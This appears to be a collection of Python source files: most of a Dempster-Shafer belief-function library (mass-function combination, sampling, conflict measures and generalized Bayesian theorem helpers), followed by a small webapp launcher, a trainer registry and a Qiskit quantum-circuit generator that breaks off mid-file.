return self._combine(mass_function, rule=lambda s1, s2: s1 | s2 if not (s1 & s2) else s1 & s2, normalization=False, sample_count=sample_count, importance_sampling=False)
def combine_yager(self, mass_function, sample_count=None, importance_sampling=False):
mj = self._combine(mass_function, rule=lambda s1, s2: s1 & s2, normalization=False, sample_count=sample_count, importance_sampling=importance_sampling)
if frozenset() in mj:
mj[mj.frame()] += mj[frozenset()]
del mj[frozenset()]
return mj
def _combine(self, mass_function, rule, normalization, sample_count, importance_sampling):
"""Helper method for combining two or more mass functions."""
combined = self
if isinstance(mass_function, MassFunction):
mass_function = [mass_function] # wrap single mass function
for m in mass_function:
if not isinstance(m, MassFunction):
raise TypeError("expected type MassFunction but got %s; make sure to use keyword arguments for anything other than mass functions" % type(m))
if sample_count == None:
combined = combined._combine_deterministic(m, rule)
else:
if importance_sampling and normalization:
combined = combined._combine_importance_sampling(m, sample_count)
else:
combined = combined._combine_direct_sampling(m, rule, sample_count)
if normalization:
return combined.normalize()
else:
return combined
def _combine_deterministic(self, mass_function, rule):
"""Helper method for deterministically combining two mass functions."""
combined = MassFunction()
for (h1, v1) in self.items():
for (h2, v2) in mass_function.items():
combined[rule(h1, h2)] += v1 * v2
return combined
def _combine_direct_sampling(self, mass_function, rule, sample_count):
"""Helper method for approximatively combining two mass functions using direct sampling."""
combined = MassFunction()
samples1 = self.sample(sample_count)
samples2 = mass_function.sample(sample_count)
for i in range(sample_count):
combined[rule(samples1[i], samples2[i])] += 1.0 / sample_count
return combined
def _combine_importance_sampling(self, mass_function, sample_count):
"""Helper method for approximatively combining two mass functions using importance sampling."""
combined = MassFunction()
for (s1, n) in self.sample(sample_count, as_dict=True).items():
weight = mass_function.pl(s1)
for s2 in mass_function.condition(s1).sample(n):
combined[s2] += weight
return combined
def combine_gbt(self, likelihoods, normalization=True, sample_count=None, importance_sampling=True):
"""
Conjunctively combines the mass function with a mass function obtained from a sequence of
likelihoods via the generalized Bayesian theorem and returns the combination as a new mass function.
Equivalent to 'combine_conjunctive(MassFunction.gbt(likelihoods))'.
By ignoring incompatible likelihoods, it is generally faster than the former
method and yields a better Monte-Carlo approximation in case of normalization.
'likelihoods' specifies the conditional plausibilities for a set of singleton hypotheses.
It can either be a dictionary mapping singleton hypotheses to plausibilities or an iterable
containing tuples consisting of a singleton hypothesis and a corresponding plausibility value.
All arguments except for 'likelihoods' must be specified as keyword arguments.
'normalization' determines whether the resulting mass function is normalized, i.e., whether m({}) == 0.
If 'sample_count' is not None, the true mass function is approximated using the specified number of samples.
See 'combine_conjunctive' for details on the effect of setting 'importance_sampling'.
"""
core = self.core() # restrict to generally compatible likelihoods
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
likelihoods = [l for l in likelihoods if l[1] > 0 and l[0] in core]
if sample_count == None: # deterministic
return self.combine_conjunctive(MassFunction.gbt(likelihoods), normalization=normalization)
else: # Monte-Carlo
if not normalization: # only use importance sampling in case of normalization
importance_sampling = False
combined = MassFunction()
for s, n in self.sample(sample_count, as_dict=True).items():
if importance_sampling:
compatible_likelihoods = [l for l in likelihoods if l[0] in s]
weight = 1.0 - reduce(mul, [1.0 - l[1] for l in compatible_likelihoods], 1.0)
else:
compatible_likelihoods = likelihoods
if not compatible_likelihoods:
continue
if normalization:
empty_mass = reduce(mul, [1.0 - l[1] for l in compatible_likelihoods], 1.0)
for _ in range(n):
rv = [random() for _ in range(len(compatible_likelihoods))]
subtree_mass = 1.0
hyp = set()
for k in range(len(compatible_likelihoods)):
l = compatible_likelihoods[k][1]
norm = 1.0 if hyp or not normalization else 1.0 - empty_mass / subtree_mass
if l / norm > rv[k]:
hyp.add(compatible_likelihoods[k][0])
else:
subtree_mass *= 1.0 - l # only relevant for negative case
if importance_sampling:
combined[hyp] += weight
else:
combined[hyp & s] += 1.0
if normalization:
return combined.normalize()
else:
return combined
def condition(self, hypothesis, normalization=True):
"""
Conditions the mass function with 'hypothesis'.
'normalization' determines whether the resulting conjunctive combination is normalized (must be specified as a keyword argument).
Shorthand for self.combine_conjunctive(MassFunction({hypothesis:1.0}), normalization).
"""
m = MassFunction({MassFunction._convert(hypothesis):1.0})
return self.combine_conjunctive(m, normalization=normalization)
def conflict(self, mass_function, logval=True, sample_count=None):
"""
Calculates the weight of conflict between two or more mass functions.
If 'mass_function' is not of type MassFunction, it is assumed to be an iterable containing multiple mass functions.
The weight of conflict is computed as the (natural) logarithm of the normalization constant in Dempster's rule of combination or as that constant itself if logval==false.
Returns infinity in case the mass functions are flatly contradicting.
"""
# compute full conjunctive combination (could be more efficient)
m = self.combine_conjunctive(mass_function, normalization=False, sample_count=sample_count)
empty = m[frozenset()]
m_sum = fsum(m.values())
diff = m_sum - empty
if diff == 0.0:
return float('inf')
else:
if logval is True:
return -log(diff)
else:
return 1- diff
def normalize(self):
"""
Normalizes the mass function in-place.
Sets the mass value of the empty set to 0 and scales all other values such that their sum equals 1.
For convenience, the method returns 'self'.
"""
if frozenset() in self:
del self[frozenset()]
mass_sum = fsum(self.values())
if mass_sum != 1.0:
for (h, v) in self.items():
self[h] = v / mass_sum
return self
def discount(self, r):
"""
Discounts the mass function by factor r. The method returns 'self'
"""
mass_omega = self[self.frame()]
for (h, v) in self.items():
self[h] = v * r
self[self.frame()] = 1 - (r * (1-mass_omega))
return self
def prune(self):
"""
Removes all non-focal (0 mass) hypotheses in-place.
For convenience, the method returns 'self'.
"""
remove = [h for (h, v) in self.items() if v == 0.0]
for h in remove:
del self[h]
return self
def markov(self, transition_model, sample_count=None):
"""
Computes the mass function induced by a prior belief (self) and a transition model.
The transition model expresses a joint belief over the frame of this mass function and a new frame.
The belief over the frame of this mass function is implicitly assumed to be vacuous.
The transition model is a function returning the conditional belief over the new frame (as a mass function
if sample_count=None) while taking a singleton hypothesis of the current frame as input.
The disjunctive rule of combination is then used to construct the mass function over the new frame.
If 'sample_count' is not None, the true mass function is approximated using the specified number of samples.
In this case, 'transition_model' is expected to take a second argument stating how many samples from the corresponding conditional mass function should be returned.
The return value in this case is expected to be an iterable over sampled hypotheses from the new frame.
This method can be used to implement the prediction step for estimation in a hidden Markov process (hence the name).
Under this interpretation, the transition model expresses the mass distribution over successor states given the current state.
"""
updated = MassFunction()
if sample_count == None: # deterministic
for k, v in self.items():
predicted = None
for e in k:
if predicted == None:
predicted = transition_model(e)
else:
predicted |= transition_model(e)
for kp, vp in predicted.items():
updated[kp] += v * vp
else: # Monte-Carlo
for s, n in self.sample(sample_count, as_dict=True).items():
unions = [[] for _ in range(n)]
for e in s:
ts = transition_model(e, n)
for i, t in enumerate(ts):
unions[i].extend(t)
for u in unions:
updated[u] += 1.0 / sample_count
return updated
def map(self, function):
"""
Maps each hypothesis to a new hypothesis using 'function' and returns the new mass function.
'function' is a function taking a hypothesis as its only input and returning a new hypothesis
(i.e., a sequence that can be converted to a 'frozenset').
Here are some example use cases:
1. Vacuous extension to a multi-dimensional frame of discernment (m is defined over
the frame A while the new mass function is defined over the Cartesian product AxB):
B = {'x', 'y', 'z'}
m.map(lambda h: itertools.product(h, B))
2. Projection to a lower dimensional frame (m is defined over AxBxC such that each hypothesis is
a set of tuples where each tuple consists of 3 elements; the new mass function is defined over BxC):
m.map(lambda h: (t[1:] for t in h))
"""
m = MassFunction()
for (h, v) in self.items():
m[self._convert(function(h))] += v
return m
def pignistic(self):
"""Computes the pignistic transformation and returns it as a new mass function consisting only of singletons."""
p = MassFunction()
for (h, v) in self.items():
if v > 0.0:
size = float(len(h))
for s in h:
p[(s,)] += v / size
return p.normalize()
def local_conflict(self):
"""
Computes the local conflict measure.
For more information, see Pal et al. 1993. Uncertainty measures for evidential reasoning II:
A new measure of total uncertainty. International Journal of Approximate Reasoning.
Only works for normalized mass functions.
If the mass function is unnormalized, the method returns float('nan')
In case the mass function is a probability function (containing only singleton hypotheses),
it reduces to the classical entropy measure.
"""
if self[frozenset()] > 0.0:
return float('nan')
c = 0.0
for (h, v) in self.items():
if v > 0.0:
c += v * log(len(h) / v, 2)
return c
def hartley_measure(self):
"""
Computes the Hartley-like measure in order to quantify the amount of imprecision.
For more information, see:
G. J. Klir (1999), "Uncertainty and information measures for imprecise probabilities: An overview",
International Symposium on Imprecise Probabilities and Their Applications.
"""
return fsum([v * log(len(h), 2) for h, v in self.items()])
def norm(self, m, p=2):
"""
Computes the p-norm between two mass functions (default is p=2).
Both mass functions are treated as vectors of mass values.
"""
d = fsum([(v - m[h])**p for (h, v) in self.items()])
for (h, v) in m.items():
if h not in self:
d += v**p
return d**(1.0 / p)
def distance(self, m):
"""
Computes the Jaccard-based distance between the two mass functions
"""
#need to gather all keys
keys = numpy.array(list(set(self.keys()).union(set(m.keys()))))
ands = keys[:,None] & keys
ors = keys[:,None] | keys
def jac(a, b):
return len(a) / len(b)
vfunc = numpy.vectorize(jac)
jaccard = vfunc(ands, ors)
av = numpy.array( [self[k] for k in keys] )
bv = numpy.array([m[k] for k in keys] )
diff = av - bv
return (numpy.dot(numpy.dot(diff, jaccard), diff)*0.5)**0.5
def is_compatible(self, m):
"""
Checks whether another mass function is compatible with this one.
Compatibility means that the mass value of each hypothesis in 'm' is less than
or equal to the corresponding plausibility given by this mass function.
"""
return all([self.pl(h) >= v for (h, v) in m.items()])
def sample(self, n, quantization=True, as_dict=False):
"""
Returns n random samples from the mass distribution.
Hypotheses are drawn with a probability proportional to their mass values (with replacement).
If 'quantization' is True (default), the method performs a quantization of the mass values.
This means the frequency of a hypothesis h in the sample set is at least int(self[h] * n / t) where t is the sum of all mass values.
The remaining sample slots (if any) are filled up according to the remainders of the fractions computed in the first step.
The parameter 'as_dict' determines the type of the returned value.
If 'as_dict' is False (default), a list of length n is returned.
Otherwise, the result is a dictionary specifying the number of samples for each hypothesis.
"""
if not isinstance(n, int):
raise TypeError("n must be int")
samples = {h:0 for h in self} if as_dict else []
mass_sum = fsum(self.values())
if quantization:
remainders = []
remaining_sample_count = n
for (h, v) in self.items():
fraction = n * v / mass_sum
quotient = int(fraction)
if quotient > 0:
if as_dict:
samples[h] = quotient
else:
samples.extend([h] * quotient)
remainders.append((h, fraction - quotient))
remaining_sample_count -= quotient
remainders.sort(reverse=True, key=lambda hv: hv[1])
for h, _ in remainders[:remaining_sample_count]:
if as_dict:
samples[h] += 1
else:
samples.append(h)
else:
rv = [uniform(0.0, mass_sum) for _ in range(n)]
hypotheses = sorted(self.items(), reverse=True, key=lambda hv: hv[1])
for i in range(n):
mass = 0.0
for (h, v) in hypotheses:
mass += v
if mass >= rv[i]:
if as_dict:
samples[h] += 1
else:
samples.append(h)
break
if not as_dict:
shuffle(samples)
return samples
def contour_consistency(self):
""""
Contour consistency
"""
return self.pl(self.max_pl())
def contour_conflict(self):
return 1-self.contour_consistency()
def shapley(self, masses, normalization, f, *args ):
masses_pset = chain.from_iterable(combinations(masses, r) for r in range(len(masses)+1))
sum = 0
mv = MassFunction([(self.frame(), 1)])
for coalition in masses_pset:
factor = factorial(len(coalition)) * factorial(len(masses) - len(coalition)) / factorial(len(masses) +1)
if coalition:
m0 = mv.combine_conjunctive(coalition, normalization)
m1 = self.combine_conjunctive(coalition, normalization)
else:
m0 = mv
m1 = self
args0 = (m0,) + args
args1 = (m1,) + args
sum += factor * (f(*args1) - f(*args0))
return sum
def shapley_yager(self, masses, f, *args ):
masses_pset = chain.from_iterable(combinations(masses, r) for r in range(len(masses)+1))
sum = 0
mv = MassFunction([(self.frame(), 1)])
for coalition in masses_pset:
factor = factorial(len(coalition)) * factorial(len(masses) - len(coalition)) / factorial(len(masses) +1)
if coalition:
m0 = mv.combine_yager(coalition)
m1 = self.combine_yager(coalition)
else:
m0 = mv
m1 = self
args0 = (m0,) + args
args1 = (m1,) + args
sum += factor * (f(*args1) - f(*args0))
return sum
def shapley_conj_disj(self, masses, f, *args ):
masses_pset = chain.from_iterable(combinations(masses, r) for r in range(len(masses)+1))
sum = 0
mv = MassFunction([(self.frame(), 1)])
for coalition in masses_pset:
factor = factorial(len(coalition)) * factorial(len(masses) - len(coalition)) / factorial(len(masses) +1)
if coalition:
m0 = mv.combine_conjunctive_disjunctive(coalition)
m1 = self.combine_conjunctive_disjunctive(coalition)
else:
m0 = mv
m1 = self
args0 = (m0,) + args
args1 = (m1,) + args
sum += factor * (f(*args1) - f(*args0))
return sum
def shapley_disj(self, masses, f, *args ):
masses_pset = chain.from_iterable(combinations(masses, r) for r in range(len(masses)+1))
sum = 0
mv = MassFunction([(self.frame(), 1)])
for coalition in masses_pset:
factor = factorial(len(coalition)) * factorial(len(masses) - len(coalition)) / factorial(len(masses) +1)
if coalition:
if len(coalition)>1:
m0 = coalition[0].combine_conjunctive_disjunctive(coalition[1:])
else:
m0 = coalition[0]
m1 = self.combine_disjunctive(coalition)
else:
m0 = mv
m1 = self
args0 = (m0,) + args
args1 = (m1,) + args
sum += factor * (f(*args1) - f(*args0))
return sum
def is_probabilistic(self):
"""
Checks whether the mass function is a probability function.
Returns True if and only if all hypotheses are singletons (normalization is ignored).
"""
return all([len(h) == 1 for h in self.keys()])
def sample_probability_distributions(self, n):
"""
Randomly generates n compatible probability distributions from the mass function.
The result is a list of n independently sampled probability distributions expressed as mass functions.
This can be useful for estimating various statistical measures like the minimum or maximum entropy consistent with the mass distribution.
"""
samples = [MassFunction() for _ in range(n)]
for i in range(n):
for (h, v) in self.items():
if len(h) == 1:
samples[i][h] += v
else:
rv = [random() for _ in range(len(h))]
total = fsum(rv)
for k, s in enumerate(h):
samples[i][{s}] += rv[k] * v / total
return samples
def max_bel(self):
"""
Returns the singleton with the highest belief.
In case there are multiple singletons with maximum belief, only one of them is returned.
Returns None, if the mass function does not contain any hypotheses.
"""
return self._max_singleton(self.bel)
def max_pl(self):
"""
Returns the singleton with the highest plausibility.
In case there are multiple singletons with maximum plausibility, only one of them is returned.
Returns None, if the mass function does not contain any hypotheses.
"""
return self._max_singleton(self.pl)
def _max_singleton(self, f):
st = self.singletons()
if st:
value_list = [(f(s), s) for s in st]
shuffle(value_list)
return max(value_list)[1]
else:
return None
def to_dict(self):
"""Convert a mass function only consisting of singletons to a dictionary by removing each enclosing frozenset."""
if not self.is_probabilistic():
raise Exception('mass function must only contain singletons')
return {tuple(h)[0]:v for h, v in self.items()}
@staticmethod
def from_dict(d):
"""Convert a dictionary to a mass function by enclosing each key with a frozenset."""
if isinstance(d, MassFunction):
return d
else:
return MassFunction({frozenset((h,)):v for h, v in d.items()})
@staticmethod
def from_possibility(poss):
"""
Constructs a consonant mass function from a possibility distribution.
For more information, see:
D. Dubois, H. Prade (1982), "On several representations of an uncertainty body of evidence",
Fuzzy Information and Decision Processes, 167-181.
"""
if isinstance(poss, MassFunction):
poss = poss.to_dict() # remove enclosing sets
H, P = zip(*sorted(poss.items(), key=lambda e: e[1], reverse=True)) # sort possibility values in descending order
m = MassFunction()
m[H] = P[-1]
for i in range(len(H) - 1):
m[H[:i + 1]] = P[i] - P[i + 1]
return m
@staticmethod
def pignistic_inverse(p):
"""
Constructs a consonant mass function from a pignistic probability distribution by applying the inverse pignistic transformation.
For more information, see:
D. Dubois, H. Prade, P. Smets (2008), "A definition of subjective possibility",
International Journal of Approximate Reasoning 48 (2), 352-364.
"""
p = MassFunction.from_dict(p)
poss = MassFunction({h1:fsum([min(p[h1], p[h2]) for h2 in p.keys()]) for h1 in p.keys()})
return MassFunction.from_possibility(poss)
@staticmethod
def _to_array_index(hypothesis, frame):
"""Map a hypothesis to an array index given a frame of discernment."""
index = 0
for i, s in enumerate(frame):
if s in hypothesis:
index += 2**i
return index
@staticmethod
def _from_array_index(index, frame):
"""Map an array index to a hypothesis given a frame of discernment."""
hypothesis = set()
for i, s in enumerate(frame):
if 2**i & index:
hypothesis.add(s)
return frozenset(hypothesis)
def to_array(self, frame):
"""
Convert the mass function to a NumPy array.
Hypotheses are mapped to array indices using '_to_array_index'.
The resulting array has 2^n entries where n is the size of the frame of discernment.
"""
a = numpy.zeros(2**len(frame))
for h, v in self.items():
a[MassFunction._to_array_index(h, frame)] = v
return a
@staticmethod
def from_array(a, frame):
"""
Convert a NumPy array to a mass function given a frame of discernment.
Array indices are mapped to hypotheses using '_from_array_index'.
"""
m = MassFunction()
for i, v in enumerate(a):
if v > 0.0:
m[MassFunction._from_array_index(i, frame)] = v
return m
@staticmethod
def _confidence_intervals(histogram, alpha):
"""Compute Goodman confidence intervals."""
p_lower = {}
p_upper = {}
a = chi2.ppf(1. - alpha / len(histogram), 1)
n = float(sum(histogram.values()))
for h, n_h in histogram.items():
delta_h = a * (a + 4. * n_h * (n - n_h) / n)
p_lower[h] = (a + 2. * n_h - sqrt(delta_h)) / (2. * (n + a))
p_upper[h] = (a + 2. * n_h + sqrt(delta_h)) / (2. * (n + a))
return p_lower, p_upper
@staticmethod
def from_samples(histogram, method='idm', alpha=0.05, s=1.0):
"""
Generate a mass function from an empirical probability distribution that was obtained from a limited number of samples.
This makes the expected deviation of the empirical distribution from the true distribution explicit.
'histogram' represents the empirical distribution. It is a dictionary mapping each possible event to the respective
number of observations (represented as integers).
'method' determines the algorithm used for generating the mass function.
Except for method 'bayesian', all algorithms are based on the idea that the true probabilities lie within confidence intervals
represented by the mass function with confidence level 1 - 'alpha'.
The following modes are supported:
'idm': Imprecise Dirichlet model. A small amount of mass (controlled by 's') is assigned to the entire frame.
For more information on 'idm', see:
P. Walley (1996), "Inferences from multinomial data: learning about a bag of marbles",
Journal of the Royal Statistical Society. Series B (Methodological), 3-57.
'maxbel': Maximize the total belief by solving a linear program. (Attention: this becomes very computationally expensive
for larger numbers of events.)
'maxbel-ordered': Similar to 'maxbel' except that the events are assumed to have a natural order (e.g., intervals), in which case
the mass function can be computed analytically and thus much faster.
For more information on 'maxbel' and 'maxbel-ordered', see:
T. Denoeux (2006), "Constructing belief functions from sample data using multinomial confidence regions",
International Journal of Approximate Reasoning 42, 228-252.
'mcd': Compute the least committed consonant mass function whose pignistic transformation lies within the confidence interval
induced by 'alpha'. Like 'maxbel', it is based on solving a linear program and quickly becomes computationally expensive.
'mcd-approximate': An approximation of 'mcd' that can be computed much more efficiently.
For more information on these two methods, see:
A. Aregui, T. Denoeux (2008), "Constructing consonant belief functions from sample data using confidence sets of pignistic probabilities",
International Journal of Approximate Reasoning 49, 575-594.
'bayesian': Construct a Bayesian mass function based on the relative frequencies. In addition, additive smoothing is applied (controlled by 's').
In case the sample number is 0, returns a vacuous mass function (or uniform distribution for 'bayesian').
(Requires SciPy for computing confidence intervals and solving linear programs.)
"""
if not isinstance(histogram, dict):
raise TypeError('histogram must be of type dict')
for v in histogram.values():
if not isinstance(v, int):
raise TypeError('all histogram values must be of type int')
if not histogram:
return MassFunction()
if sum(histogram.values()) == 0: # return vacuous/uniform belief if there are no samples
vac = MassFunction({tuple(histogram.keys()):1})
if method == 'bayesian':
return vac.pignistic()
else:
return vac
if method == 'bayesian':
return MassFunction({(h,):v + s for h, v in histogram.items()}).normalize()
elif method == 'idm':
return MassFunction._from_samples_idm(histogram, s)
elif method == 'maxbel':
return MassFunction._from_samples_maxbel(histogram, alpha)
elif method == 'maxbel-ordered':
return MassFunction._from_samples_maxbel(histogram, alpha, ordered=True)
elif method == 'mcd':
return MassFunction._from_samples_mcd(histogram, alpha)
elif method == 'mcd-approximate':
return MassFunction._from_samples_mcd(histogram, alpha, approximate=True)
raise ValueError('unknown method: %s' % method)
@staticmethod
def _from_samples_idm(histogram, s):
"""
Reference:
P. Walley (1996), "Inferences from multinomial data: learning about a bag of marbles",
Journal of the Royal Statistical Society. Series B (Methodological), 3-57.
"""
total = sum(histogram.values())
m = MassFunction()
for h, c in histogram.items():
m[(h,)] = float(c) / (total + s)
m[MassFunction._convert(histogram.keys())] = float(s) / (total + s)
return m
@staticmethod
def _from_samples_maxbel(histogram, alpha, ordered=False):
"""
Reference:
T. Denoeux (2006), "Constructing belief functions from sample data using multinomial confidence regions",
International Journal of Approximate Reasoning 42, 228-252.
"""
p_lower, p_upper = MassFunction._confidence_intervals(histogram, alpha)
def p_lower_set(hs):
l = u = 0
for h in H:
if h in hs:
l += p_lower[h]
else:
u += p_upper[h]
return max(l, 1 - u)
if ordered:
H = sorted(histogram.keys())
m = MassFunction()
for i1, h1 in enumerate(H):
m[(h1,)] = p_lower[h1]
for i2, h2 in enumerate(H[i1 + 1:]):
i2 += i1 + 1
if i2 == i1 + 1:
v = p_lower_set(H[i1:i2 + 1]) - p_lower[h1] - p_lower[h2]
else:
v = p_lower_set(H[i1:i2 + 1]) - p_lower_set(H[i1 + 1:i2 + 1]) - p_lower_set(H[i1:i2]) + p_lower_set(H[i1 + 1:i2])
if v > 0:
m[H[i1:i2 + 1]] = v
return m
else:
H = list(histogram.keys())
L = 2**len(H)
initial = numpy.zeros(L)
cons = []
singletons = lambda index: [i for i in range(len(H)) if 2**i & index]
# constraint (24)
bel = lambda index, m: fsum(m[sum([2**i for i in h_ind])] for h_ind in powerset(singletons(index)))
c24 = lambda m, i: p_lower_set(MassFunction._from_array_index(i, H)) - bel(i, m)
for i in range(L):
cons.append(partial(c24, i=i))
# constraint (25)
cons.append(lambda m: m.sum() - 1.0)
cons.append(lambda m: 1.0 - m.sum())
# constraint (26)
for i in range(L):
cons.append(partial(lambda m, i_s: m[i_s], i_s=i))
f = lambda m: -1 * 2**len(H) * fsum([m[i] * 2**(-len(singletons(i))) for i in range(L)])
m_optimal = fmin_cobyla(f, initial, cons, disp=0)
return MassFunction.from_array(m_optimal, H)
@staticmethod
def _from_samples_mcd(histogram, alpha, approximate=False):
"""
Reference:
A. Aregui, T. Denoeux (2008), "Constructing consonant belief functions from sample data using confidence
sets of pignistic probabilities", International Journal of Approximate Reasoning 49, 575-594.
"""
p_lower, p_upper = MassFunction._confidence_intervals(histogram, alpha)
H = list(histogram.keys())
if approximate:
# approximate possibility distribution
poss = {h1:min(1, fsum([min(p_upper[h1], p_upper[h2]) for h2 in H])) for h1 in H}
else:
# optimal possibility distribution (based on linear programming)
poss = {h:0. for h in H}
for k, h_k in enumerate(H):
S_k = {l for l in range(len(H)) if p_lower[H[l]] >= p_upper[h_k]}
S_k.add(k)
I_k = {l for l in range(len(H)) if p_upper[H[l]] < p_lower[h_k]}
P_k = set(range(len(H))).difference(S_k.union(I_k))
for A in powerset(P_k):
G = S_k.union(A)
G_c = set(range(len(H))).difference(G)
cons = []
# constraint (26)
for i, h in enumerate(H):
cons.append(partial(lambda p, i_s, p_s: p[i_s] - p_s, i_s=i, p_s=p_lower[h])) # lower bound
cons.append(partial(lambda p, i_s, p_s: p_s - p[i_s], i_s=i, p_s=p_upper[h])) # upper bound
# constraint (27)
cons.append(lambda p: 1. - sum(p))
cons.append(lambda p: sum(p) - 1.)
# constraint (30)
for i in G:
cons.append(partial(lambda p, i_s: p[i_s] - p[k], i_s=i))
# constraint (31)
for i in G_c:
cons.append(partial(lambda p, i_s: p[k] - p[i_s], i_s=i))
initial = [1.0 / len(H)] * len(H)
f = lambda p: -(fsum([p[i] for i in G_c]) + len(G) * p[k])
poss_optimal = fmin_cobyla(f, initial, cons, disp=0)
poss[h_k] = max(poss[h_k], -f(poss_optimal))
return MassFunction.from_possibility(poss)
def powerset(iterable):
"""
Returns an iterator over the power set of 'set'.
'set' is an arbitrary iterator over hashable elements.
All returned subsets are of type 'frozenset'.
"""
return map(frozenset, chain.from_iterable(combinations(iterable, r) for r in range(len(iterable) + 1)))
def gbt_m(hypothesis, likelihoods, normalization=True):
"""
Computes the mass value of 'hypothesis' using the generalized Bayesian theorem.
Equivalent to MassFunction.gbt(likelihoods, normalization)[hypothesis].
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
q = gbt_q(hypothesis, likelihoods, normalization)
return q * reduce(mul, [1.0 - l[1] for l in likelihoods if l[0] not in hypothesis], 1.0)
def gbt_bel(hypothesis, likelihoods, normalization=True):
"""
Computes the belief of 'hypothesis' using the generalized Bayesian theorem.
Equivalent to MassFunction.gbt(likelihoods, normalization).bel(hypothesis).
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
eta = _gbt_normalization(likelihoods) if normalization else 1.0
exc = reduce(mul, [1.0 - l[1] for l in likelihoods if l[0] not in hypothesis], 1.0)
all_hyp = reduce(mul, [1.0 - l[1] for l in likelihoods], 1.0)
return eta * (exc - all_hyp)
def gbt_pl(hypothesis, likelihoods, normalization=True):
"""
Computes the plausibility of 'hypothesis' using the generalized Bayesian theorem.
Equivalent to MassFunction.gbt(likelihoods, normalization).pl(hypothesis).
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
eta = _gbt_normalization(likelihoods) if normalization else 1.0
return eta * (1.0 - reduce(mul, [1.0 - l[1] for l in likelihoods if l[0] in hypothesis], 1.0))
def gbt_q(hypothesis, likelihoods, normalization=True):
"""
Computes the commonality of 'hypothesis' using the generalized Bayesian theorem.
Equivalent to MassFunction.gbt(likelihoods, normalization).q(hypothesis).
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
eta = _gbt_normalization(likelihoods) if normalization else 1.0
return eta * reduce(mul, [l[1] for l in likelihoods if l[0] in hypothesis], 1.0)
def gbt_pignistic(singleton, likelihoods):
"""
Computes the pignistic probability of 'singleton' for the belief function obtained
by applying the generalized Bayesian theorem to 'likelihoods'.
This function has time complexity O(len(likelihoods)**2) and is equivalent to the following
expression (which has exponential complexity):
MassFunction.gbt(likelihoods).pignistic()[(singleton,)]
"""
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
singleton_lh = None
lh_values = []
for h, v in likelihoods:
if h == singleton:
singleton_lh = v
else:
lh_values.append(v)
if singleton_lh is None:
raise ValueError('singleton %s is not contained in likelihoods' % repr(singleton))
m_sum = _gbt_pignistic_recursive(lh_values, 0)
eta = _gbt_normalization(likelihoods)
return sum([eta * v * singleton_lh / (c + 1.) for c, v in enumerate(m_sum)])
def _gbt_pignistic_recursive(likelihoods, i):
"""
Helper function for recursively computing the pignistic probability corresponding to the GBT.
This function computes the sum over all mass values (obtained via the GBT) and groups them by the
cardinalities of the corresponding sets.
"""
if i == len(likelihoods) - 1:
m_sum = [0.] * (len(likelihoods) + 1)
m_sum[0] = 1. - likelihoods[i]
m_sum[1] = likelihoods[i]
return m_sum
else:
m_sum = _gbt_pignistic_recursive(likelihoods, i + 1)
m_sum_inc = [0.] * (len(likelihoods) + 1)
m_sum_exc = [0.] * (len(likelihoods) + 1)
for k in range(len(likelihoods) + 1):
if k < len(likelihoods):
m_sum_inc[k+1] = m_sum[k] * likelihoods[i]
m_sum_exc[k] = m_sum[k] * (1. - likelihoods[i])
m_sum[k] = m_sum_inc[k] + m_sum_exc[k]
return m_sum
def _gbt_normalization(likelihoods):
"""Helper function for computing the GBT normalization constant."""
return 1.0 / (1.0 - reduce(mul, [1.0 - l[1] for l in likelihoods], 1.0))
|
py | b414e54450335803d96f77427edc3235fee49150 | import sys
from monitoring.uss_qualifier.webapp import webapp
from . import config
def main(argv):
del argv
webapp.run(host='localhost', port=webapp.config.get(config.KEY_RID_QUALIFIER_HOST_PORT))
if __name__ == '__main__':
main(sys.argv)
|
py | b414e61b704bffdef0408a2c44ba7f9b1206c417 | from .ctdet import CtdetTrainer
train_factory = {'ctdet': CtdetTrainer,}
|
py | b414e651c270a3f673014d09971b226807f434e6 | # qubit number=5
# total number=59
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.rx(-1.3603096190043806,input_qubit[2]) # number=28
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[3]) # number=34
prog.cz(input_qubit[4],input_qubit[3]) # number=35
prog.h(input_qubit[3]) # number=36
prog.h(input_qubit[0]) # number=38
prog.cz(input_qubit[1],input_qubit[0]) # number=39
prog.h(input_qubit[0]) # number=40
prog.x(input_qubit[0]) # number=32
prog.cx(input_qubit[1],input_qubit[0]) # number=33
prog.cx(input_qubit[0],input_qubit[1]) # number=24
prog.x(input_qubit[1]) # number=25
prog.x(input_qubit[1]) # number=41
prog.h(input_qubit[1]) # number=50
prog.cz(input_qubit[0],input_qubit[1]) # number=51
prog.h(input_qubit[1]) # number=52
prog.x(input_qubit[2]) # number=11
prog.cx(input_qubit[2],input_qubit[3]) # number=30
prog.x(input_qubit[3]) # number=12
prog.h(input_qubit[2]) # number=42
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
